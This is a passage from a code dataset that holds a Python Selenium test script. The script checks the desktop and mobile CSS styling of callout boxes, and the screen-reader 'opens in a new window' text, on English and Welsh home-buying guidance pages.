fig_comp\n\n\n","repo_name":"chris-elia/Workshop-TimeSeries-Forecaster","sub_path":"modules/forecast_univariate.py","file_name":"forecast_univariate.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"32671335096","text":"from selenium.webdriver.common.by import By\nfrom Lib import resize\nfrom Selectors.callout import callout_selectors\n\ndef runTest(baseUrl, driver, browser):\n \n print(' - Testing on {}'.format(browser))\n\n urls = [\n \"/en/homes/buying-a-home/money-timeline-when-buying-property-england-wales-n-ireland\",\n \"/cy/homes/buying-a-home/money-timeline-when-buying-property-england-wales-n-ireland\"\n ]\n\n for url in urls:\n\n iterationUrl = \"{baseUrl}{url}\".format(baseUrl=baseUrl, url=url)\n\n print('\\nVisiting {}'.format(iterationUrl))\n driver.get(iterationUrl)\n \n resize.resizeDesktop(driver)\n print('- Testing dominant callout')\n dominant_callout = driver.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_selector)\n assert dominant_callout.value_of_css_property('margin-top') == \"35px\"\n assert dominant_callout.value_of_css_property('margin-bottom') == \"21px\"\n assert dominant_callout.value_of_css_property('padding') == \"21px 0px 0px\"\n dominant_callout_wrapper = dominant_callout.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_wrapper_selector)\n assert dominant_callout_wrapper.value_of_css_property('border-width') == \"8px\"\n assert \"240, 240, 90\" in dominant_callout_wrapper.value_of_css_property('border-color')\n dominant_callout_title = dominant_callout_wrapper.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_title_selector)\n assert dominant_callout_title.value_of_css_property('font-size') == \"32px\"\n assert dominant_callout_title.value_of_css_property('font-weight') == \"700\"\n assert \"0, 11, 59\" in dominant_callout_title.value_of_css_property('color')\n assert dominant_callout_title.value_of_css_property('line-height') == \"39px\"\n print(' - Desktop Dominant callout styles ok')\n\n resize.resizeMobile(driver)\n dominant_callout = driver.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_selector)\n dominant_callout_title = dominant_callout_wrapper.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_title_selector)\n assert dominant_callout_title.value_of_css_property('font-size') == \"25px\"\n assert dominant_callout_title.value_of_css_property('line-height') == \"33px\"\n print(dominant_callout_title.value_of_css_property('line-height'))\n print(' - Mobile Dominant callout styles ok')\n\n resize.resizeDesktop(driver)\n\n print('- Testing branch callout external multi links')\n # Get all branch callouts \n branchCallouts = driver.find_elements(By.CSS_SELECTOR, callout_selectors.branch_callout_selector)\n # Get the external links\n externalLink = branchCallouts[0].find_elements(By.CSS_SELECTOR, 'a[data-link-type=\"external\"]')\n \n # Branch callout styles\n for callout in branchCallouts:\n pass\n\n # Set the expected text based on language\n if \"/en/\" in iterationUrl:\n expectedText = \"(Opens in a new window)\"\n print('- Article is English')\n print('- Expected text {}'.format(expectedText))\n elif \"/cy/\" in iterationUrl:\n expectedText = \"Yn agor mewn ffenestr newydd\"\n print('- Article is Welsh')\n print('- Expected text {}'.format(expectedText))\n\n # If the callount contains external links\n if len(externalLink) > 0:\n\n for link in externalLink:\n # Try and find the spans containing the hidden text\n try:\n linkSpan = link.find_element(By.CSS_SELECTOR, 'span.sr-only')\n spanText = linkSpan.text\n\n assert spanText == expectedText\n print('- External Multi link in branch includes the correct hidden text')\n except:\n message = \"\\n> BRANCH CALLOUT: {iterationUrl}\\n > WARNING: The external multi links are missing the hidden spans\".format(\n iterationUrl=iterationUrl\n )\n print(message)\n\n else:\n print('- Branch callout does not/no longer contains any external links')\n message = \"\\n> BRANCH CALLOUT: {iterationUrl}\\n - Branch callout does not/no longer contains any external links\".format(\n iterationUrl=iterationUrl\n )\n print(message)\n\n print(\"5123 - All callouts should be